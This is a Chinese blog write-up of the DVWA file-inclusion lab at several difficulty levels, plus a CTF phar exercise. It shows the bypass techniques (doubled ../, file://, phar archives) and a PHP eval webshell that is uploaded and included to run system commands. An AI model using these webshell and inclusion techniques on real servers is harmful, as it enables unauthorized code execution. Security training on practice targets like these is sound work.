DVWA文件包含漏洞

最新推荐文章于 2024-04-06 20:22:31 发布
最新推荐文章于 2024-04-06 20:22:31 发布
阅读量2.6k 收藏 9
点赞数 2
分类专栏: 网络安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lbwnbnbnbnbnbnbn/article/details/123855402
版权

文章目录

low

1、本地文件包含:
看看后端代码


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

发现没有对参数page进行任何的检查和过滤,尝试包含一下phpinfo.php文件
在这里插入图片描述

提示错误,但是爆出了文件的绝对路径,此时有两种方法成功包含文件
方法一:利用得到的绝对路径
在这里插入图片描述
方法二:利用相对路径
在这里插入图片描述
2、远程文件包含
使用远程文件包含需要allow_url_fopen和allow_url_include都处于打开(On)的状态,同时配合http://协议使用
此处就将本地看作“远程”,写一个webshell.txt文件,内容是

<?php phpinfo();?>

然后使用http协议直接包含即可
在这里插入图片描述

medium

查看后端代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>

此处str_replace的作用时过滤掉其中的内容(具体参考PHP官方手册str_replace函数的用法),过滤的"http://", "https://"这意味着我们不能使用远程文件包含来进行操作。但是过滤的"../", "..\\",我们可以通过复写的方式来绕过
在这里插入图片描述

high

查看后端代码


<?php
if(!function_exists('fnmatch')) {
    function fnmatch($pattern, $string) {
        return preg_match("#^".strtr(preg_quote($pattern, '#'),array('\*' => '.*', '\?'=> '.'))."$#i", $string);
    } // end
} // end if
// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

其中fnmatch() 函数根据指定的模式来匹配文件名或字符串,此处是使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件

此时就可以使用file://伪协议来欺骗服务器了,结合本地上传,首先在C盘下写一个webshell.php文档,内容是

<?php phpinfo();?>

接着使用file:// + 绝对路径的方法来包含我们所写的文档
在这里插入图片描述
吐槽:今天搞这玩意儿和孙老师奋战了一下午,我本来搭建的本地靶场和hosts文档照理来说都是正确的,可就是包含不了这个webshell.php,一直提示找不到。后来大费周章,改来改去,最后莫名其妙就行了,但是配置还是原来的配置,反正就很神奇。后来的探索中我还发现,如果浏览器双开访问dvwa靶场,它的某些模块的难度是不会变的,一直会保持impossible,恰巧这个靶场的文件包含漏洞的impossible难度是无解的。这就导致在修改完成之后的实验中,仍处于找不到文件的状态。(我真的坠了)也怪我们没有仔细检查难度到底有没有正确调整,反正浪费了一下午就是说…

impossible

查看后端代码


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

可以看到此题要求page的参数只能为“include.php”、“file1.php”、“file2.php”、“file3.php”。这就意味着我们只能访问页面中的这三个文件,所以此难度无解

文件上传+包含漏洞getshell

其实最好的展示方式是用图片马,但是我自己根据教程生成的图片马用不了不知道为啥。那就随便用个一句话来实现吧,写一个webshell.txt,内容是

<?php eval($_POST[cmd]);?>

实验的环境是dvwa靶场的low级别,上传之后回显地址
在这里插入图片描述
之后进入文件包含漏洞,包含刚刚上传的文件
在这里插入图片描述
在这里插入图片描述
getshell成功,也可以通过菜刀蚁剑等来获取网站权限

云演-phar实验

这边看不到后端代码,直接上传php文件试试
在这里插入图片描述
返回 You are not a txt file… 说明要求我们上传txt文件,上传试试
发现 Success upload. FileName: ./files/QTpdrwXEeNybayiJ.txt 上传成功并回显地址,底下LFI Here说明有本地文件包含漏洞的,点着看看http://580c53bf.lxctf.net/lfi.php,说明此处的 lfi.php文件可能就是有漏洞的文件
访问刚刚回显的文件试试
在这里插入图片描述
还是没用。(黔驴技穷了,我选择实验手册)
查看 lfi.txt

<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>

拨开云雾见光明,发现以 file 来接收参数,而且只允许包含php文件,还会在文件的末尾添加“.php”。这里因为只能上传 txt 文件,那么就需要包含来解析了。但是会在文件的末尾添加“.php”,所以直接包含是找不到我们上传的 txt 文件的,而且%00也不能用。

此时就可以用phar伪协议,它的使用前提是不添加前缀,可以用在添加后缀或者只能上传docx、zip、rar等压缩类文件,不能直接包含利用的情况。
利用方式是:首先将一个文件压缩,然后修改后缀名(jpg,txt,png都可,本题是txt)上传,最后包含上传的文件即可。例如本题:

先写一个webshell.php文档,内容是

p eval($_POST[cmd]);?>

之后压缩,并修改后缀名为.txt
在这里插入图片描述
直接上传改文件,然后包含php文件即可(此处应该注意,由于后端已经添加后缀,故包含webshell.php时直接访问webshell即可,自动添加后缀访问webshell.php)
在这里插入图片描述
发现包含成功,使用cmd=system("dir");(cmd是我设置的密码)查看目录文件
在这里插入图片描述
发现有flag.php文件,使用cmd=system("type flag.php");访问此文件获取flag
在这里插入图片描述
使用菜刀或者蚁剑同样可以获取flag

西电卢本伟
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA文件包含漏洞File Inclusion)
qq_54537919的博客
06-27 1133
DVWA文件包含漏洞File Inclusion)
broadcast_validation.tcl.tar.gz_DSP编程_tcl/tk_
08-11
i am uploading very useful file.
hwvalid.rar_Linux/Unix编程_Unix_Linux_
08-11
Module Name: hwvalid - I/O request validation.
DVWA——文件包含
最新发布
m0_74426634的博客
04-06 953
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞
Input_Validation.zip_it_java validation
09-21
IT is a input validation system in java
cns3420vb.rar_Linux/Unix编程_Unix_Linux_
08-11
Cavium Networks CNS3420 Validation Board for Linux.
DVWA系列之14 文件包含漏洞分析
weixin_34357928的博客
12-15 167
程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。PHP中提供了四个文件包含的函数,分别是include()、include_once()、requi...
dvwa-文件包含漏洞
AI_SumSky的博客
11-26 887
文件包含漏洞 low级别 随便点了个文件发现有传导文件参数 Windows常见的敏感信息路径 系统版本:C:\boot.ini IIS配置文件:C:\windows\system32\inetsrv\MetaBase.xml 存储Windows系统初次安装的密码:C:\windows\repair\sam 查看php配置信息:C:\windows\php.ini Linux常见的敏感信息路径 系统用户信息:/etc/passwd DNS配置文件:/etc/resolv.conf ssh生成文件:/root
Dvwa 文件包含漏洞:保姆级操作
chlet的博客
10-27 1091
Dvwa 文件包含漏洞 原理部分: PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 通过引入文件时,用户可控,没有严格的检验,或是被绕过,操作一些敏感文件,导致文件泄露和恶意代码注入 当包含文件在服务器本地上,就形成本地文件包含,当包含的文件在第三方服务器是,就形成可远程文件包含。 程序开发人员一般会把重复使用的
DVWA文件包含漏洞
weixin_56306210的博客
05-11 1542
DVWA文件包含漏洞
DVWA文件包含漏洞
sunshine1_0的博客
04-04 2306
什么是文件包含漏洞安全级别 中安全级别 高安全级别 什么是文件包含漏洞 文件包含漏洞:即File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可 以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文 件,此时如果没有对文件来源进行严格审查...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA-master.zip
03-13
DVWA是一款渗透测试的演练系统,用于常规WEB漏洞教学和WEB脆弱性测试。包含了SQL注入、文件上传、XSS等一些常见的安全漏洞
Dvwa最新版本2022可用,下载到phpstudy,www目录下就可使用
06-28
DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。 【许可】DVWA是一个免费软件,在遵守自由软件基金会发布的GNU通用公共许可的前提下,你可以重新发布它和/或修改它。许可可以是版本3,...
DVMA-渗透测试漏洞练习平台
12-02
DVMA-渗透测试漏洞练习平台, 其中内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境
DVWA操作手册(二)文件包含,文件上传,SQL注入,SQL盲注
qq_41945550的博客
08-06 625
2.4 File Inclusion 文件包含 2.4.1 low难度 源代码: <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 可以看到low等级没有做任何过滤。首先尝试一下包含一个不存在的文件。 通过返回结果可以看到已经把网站的绝对路径给爆出来了。 利用文件上传加文件包含的组合拳来进行进一步操作。通过文件上传个图片马,然后通过文件包含执行该图片。 http://192.168.88.224/dvwa/vul
DVWAFile Inclusion
谢公子的博客
08-05 1380
File Inclusion File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件...
DVWA-文件包含漏洞
weixin_51706044的博客
05-16 1752
文章目录原理以及介绍一、文件包含二、环境配置三、LOW级别查看源码本地文件包含远程文件包含 原理以及介绍 在通过PHP的相应函数(比如include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 文件包含漏洞的形成,需要满足两个条件: include()等函数通过动态变量的方式引入需要包含的文件 用户能够控制这个动态变量 在文件包含漏洞中,进行文件包含时PHP 伪协议的掌握是必不可少的 这里不一一说明,留下大佬的博客可以去借阅学
validation_freq = 100 // 32
06-08
假设你的训练集大小为 $N$,batch size 为 $B$,那么 `validation_freq` 参数可以通过以下公式计算: ``` validation_freq = N // (B * k) ``` 其中,$k$ 是一个常数,它的取值通常在 1-5 之间。这个公式的含义是,每训练 `validation_freq` 个 batch,就进行一次验证。 假如你的训练集大小为 1000,batch size 为 32,$k$ 取 1,那么 `validation_freq` 的值为: ``` validation_freq = 1000 // (32 * 1) = 31 ``` 也就是说,每训练 31 个 batch,就进行一次验证。如果 $k$ 取 2 或 3,那么 `validation_freq` 的值会更大一些,验证的频率就会降低,从而加快训练速度。但是,如果 $k$ 取的太大,会导致验证的频率过低,可能会影响模型的性能。因此,需要根据具体情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值